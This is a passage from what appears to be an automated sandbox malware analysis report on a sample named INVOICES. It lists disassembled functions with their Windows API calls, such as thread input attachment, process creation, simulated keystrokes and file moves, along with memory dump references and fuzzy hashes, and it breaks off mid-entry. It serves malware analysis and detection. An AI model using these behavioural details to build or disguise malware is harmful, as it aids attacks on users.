                                                                                                                                  • CoUninitialize.COMBASE ref: 007A8A23
                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 007A8B23
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 007A8C50
                                                                                                                                  • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,007C2C0C), ref: 007A8C84
                                                                                                                                  • CoGetObject.OLE32(?,00000000,007C2C0C,?), ref: 007A8CA7
                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 007A8CBA
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007A8D3A
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 007A8D4A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2395222682-0
                                                                                                                                  • Opcode ID: 4847b649f1e07a7387a6af2d243260ea007e40f09f13756c33faac918e64f1e7
                                                                                                                                  • Instruction ID: 777195d7ef64bb154f9a62cbec264592b9dd88524fbd7020f939d4ff3d4632c9
                                                                                                                                  • Opcode Fuzzy Hash: 4847b649f1e07a7387a6af2d243260ea007e40f09f13756c33faac918e64f1e7
                                                                                                                                  • Instruction Fuzzy Hash: C6C135B1604305AFD740DF28C884A2BB7E9FF89748F004A5DF58A9B251DB75ED05CB62
                                                                                                                                  Function 00797A39 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00797B15
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1725837607-0
                                                                                                                                  • Opcode ID: 48ca3266dbaf60dfb1221869a13b625aa27a2a0bad5c4ff6b507635b2d8969f1
                                                                                                                                  • Instruction ID: 67b2662719df0a059274de3ed1731a44fb8cbdd42c49ef38a284bb110b2b9687
                                                                                                                                  • Opcode Fuzzy Hash: 48ca3266dbaf60dfb1221869a13b625aa27a2a0bad5c4ff6b507635b2d8969f1
                                                                                                                                  • Instruction Fuzzy Hash: D6B1A071A28219DFDF14DF94E885BBEB7B4FF49321F204469E500EB291D738A945CBA0
                                                                                                                                  Function 007914FF Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00791521
                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00790599,?,00000001), ref: 00791535
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0079153C
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00790599,?,00000001), ref: 0079154B
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0079155D
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00790599,?,00000001), ref: 00791576
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00790599,?,00000001), ref: 00791588
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00790599,?,00000001), ref: 007915CD
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00790599,?,00000001), ref: 007915E2
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00790599,?,00000001), ref: 007915ED
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                  • Opcode ID: 180a51ce0b7720833d35dfc27673cc80bdafa7ebfceea67d84e8efcedb43f483
                                                                                                                                  • Instruction ID: 6f355b4e7c19387f74550821e2f0d3ed5f71fe59fc637aab8c338b7f42f6e4c6
                                                                                                                                  • Opcode Fuzzy Hash: 180a51ce0b7720833d35dfc27673cc80bdafa7ebfceea67d84e8efcedb43f483
                                                                                                                                  • Instruction Fuzzy Hash: 4031BF71900205BFEF10AF54FC48FB937AAAB94315F52C126F906C61A0DB7C9D60CB68
                                                                                                                                  Function 0078A473 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnumChildWindows.USER32(?,0078A844), ref: 0078A782
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                                  • Opcode ID: 5913e10ae68f61459cbc8be6f2c9e169cb499ef67c67c958d11ceb58ac3fc71c
                                                                                                                                  • Instruction ID: 237cc6127c743014f39343a4fa2bc6566f15e870f81a76af2ed386af42720383
                                                                                                                                  • Opcode Fuzzy Hash: 5913e10ae68f61459cbc8be6f2c9e169cb499ef67c67c958d11ceb58ac3fc71c
                                                                                                                                  • Instruction Fuzzy Hash: 1091F570A00646FBEB18EF64C4C5BEDFB74BF04310F14812AE859A7152DF386999DBA1
                                                                                                                                  Function 00732E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00732EAE
                                                                                                                                    • Part of subcall function 00731DB3: GetClientRect.USER32(?,?), ref: 00731DDC
                                                                                                                                    • Part of subcall function 00731DB3: GetWindowRect.USER32(?,?), ref: 00731E1D
                                                                                                                                    • Part of subcall function 00731DB3: ScreenToClient.USER32(?,?), ref: 00731E45
                                                                                                                                  • GetDC.USER32 ref: 0076CEB2
                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0076CEC5
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0076CED3
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0076CEE8
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0076CEF0
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0076CF7B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                  • Opcode ID: 4f593af35cfe8dc73a31d14028ffd749c9b576e322f9f4de97e7e469d55e9310
                                                                                                                                  • Instruction ID: bbfeea877e02564d34fa7e47e1f48c0d72f444319cdacb19e58f0a529868ee91
                                                                                                                                  • Opcode Fuzzy Hash: 4f593af35cfe8dc73a31d14028ffd749c9b576e322f9f4de97e7e469d55e9310
                                                                                                                                  • Instruction Fuzzy Hash: FC71A031500205DFDF229F64CC89AFA7BB6FF49360F14826AED965A266C7398C41DF60
                                                                                                                                  Function 007A8D5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007BF910), ref: 007A8E3D
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007BF910), ref: 007A8E71
                                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007A8FEB
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007A9015
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 560350794-0
                                                                                                                                  • Opcode ID: f30687dfeb0acb1eae2aadfcc1c09e52a0f1793b10ade7af7a356f4d15700acd
                                                                                                                                  • Instruction ID: b40106d109c17a458376974d4447c03bbe9e94bbd403ec311d2aa3f6b0a52937
                                                                                                                                  • Opcode Fuzzy Hash: f30687dfeb0acb1eae2aadfcc1c09e52a0f1793b10ade7af7a356f4d15700acd
                                                                                                                                  • Instruction Fuzzy Hash: C9F17D71A00209EFDF04DF94C888EAEB7B9FF8A314F108598F915AB251DB35AE45CB51
                                                                                                                                  Function 007AF7A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007AF7C9
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007AF95C
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007AF980
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007AF9C0
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007AF9E2
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007AFB5E
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007AFB90
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 007AFBBF
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 007AFC36
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4090791747-0
                                                                                                                                  • Opcode ID: 7979b3788c41c03e3d1f57232e99fbb9259fa48da2c3e681e40276a1bcad7b14
                                                                                                                                  • Instruction ID: ec0142b896ee55407a0cc715aa16443efc0524ce4f457f1493c422c97c788d53
                                                                                                                                  • Opcode Fuzzy Hash: 7979b3788c41c03e3d1f57232e99fbb9259fa48da2c3e681e40276a1bcad7b14
                                                                                                                                  • Instruction Fuzzy Hash: DCE1D831204300DFC714EF74C895B6ABBE1AF86354F14856DF8899B2A2DB78EC45CB52
                                                                                                                                  Function 0073201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00731B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00732036,?,00000000,?,?,?,?,007316CB,00000000,?), ref: 00731B9A
                                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007320D3
                                                                                                                                  • KillTimer.USER32(-00000001,?,?,?,?,007316CB,00000000,?,?,00731AE2,?,?), ref: 0073216E
                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 0076BE26
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0076BE9C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2402799130-0
                                                                                                                                  • Opcode ID: be0af644a1c7f245cf924a56c18b117af146d5a327b23cd35c0af481e423bdc2
                                                                                                                                  • Instruction ID: 8265e93e7b02ec37855fb67e244b966a693d267111672d928414fe1b599f3313
                                                                                                                                  • Opcode Fuzzy Hash: be0af644a1c7f245cf924a56c18b117af146d5a327b23cd35c0af481e423bdc2
                                                                                                                                  • Instruction Fuzzy Hash: EA617C31100A10DFEB39AF14DD48B2AB7F1FB40712F508529E6428B972C77DA896DB94
                                                                                                                                  Function 00794D68 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007946AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007936DB,?), ref: 007946CC
                                                                                                                                    • Part of subcall function 007946AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007936DB,?), ref: 007946E5
                                                                                                                                    • Part of subcall function 00794AD8: GetFileAttributesW.KERNEL32(?,0079374F), ref: 00794AD9
                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00794DE7
                                                                                                                                  • _wcscmp.LIBCMT ref: 00794E01
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00794E1C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 793581249-0
                                                                                                                                  • Opcode ID: 3ebe6160a5bf5b85875cb6ae6195e439e971d7e95ae7f1d00320b63d7afca140
                                                                                                                                  • Instruction ID: 17e816e354bf9c8bd827d2d8b59252fee2fa06c44e4d2c4531359ca339472673
                                                                                                                                  • Opcode Fuzzy Hash: 3ebe6160a5bf5b85875cb6ae6195e439e971d7e95ae7f1d00320b63d7afca140
                                                                                                                                  • Instruction Fuzzy Hash: 5F5141B20083859BCB24EB94D885DDFB7ECAF85301F04492EF585D3152EE78A68D8756
                                                                                                                                  Function 007B8677 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007B8731
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                  • Opcode ID: c471546250d55f12f9fd90d1b3f4ad3102a96efac941835c371fb07a3d56a249
                                                                                                                                  • Instruction ID: 1487ce8a7cc620bf5dda60375b7659db771622d9b3cd30fd3e5338954ec032d3
                                                                                                                                  • Opcode Fuzzy Hash: c471546250d55f12f9fd90d1b3f4ad3102a96efac941835c371fb07a3d56a249
                                                                                                                                  • Instruction Fuzzy Hash: D751B070510204FFEB609B69CC89FE93B6CEB05724F604556FA15E61E2CF79E980CB52
                                                                                                                                  Function 00732B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0076C477
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0076C499
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0076C4B1
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0076C4CF
                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0076C4F0
                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 0076C4FF
                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0076C51C
                                                                                                                                  • DestroyCursor.USER32(?), ref: 0076C52B
                                                                                                                                    • Part of subcall function 007BA4E1: DeleteObject.GDI32(00000000), ref: 007BA51A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2975913752-0
                                                                                                                                  • Opcode ID: 78c381635b780e919edd0abc9c0b347f14fd37f6bfc9b41bc9242f058cdfcea1
                                                                                                                                  • Instruction ID: d904c56956830515de5a85ca9234bfc3b896ef739823bf26ba4e0078bfe617a5
                                                                                                                                  • Opcode Fuzzy Hash: 78c381635b780e919edd0abc9c0b347f14fd37f6bfc9b41bc9242f058cdfcea1
                                                                                                                                  • Instruction Fuzzy Hash: B6515D70610209EFEB24DF24DC45FBA7BB5EB58720F204628F94297292DB78ED51DB60
                                                                                                                                  Function 00789930 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0078AC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 0078AC57
                                                                                                                                    • Part of subcall function 0078AC37: GetCurrentThreadId.KERNEL32 ref: 0078AC5E
                                                                                                                                    • Part of subcall function 0078AC37: AttachThreadInput.USER32(00000000,?,00789945,?,00000001), ref: 0078AC65
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00789950
                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0078996D
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00789970
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00789979
                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00789997
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0078999A
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 007899A3
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007899BA
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007899BD
                                                                                                                                  Memory Dump Source
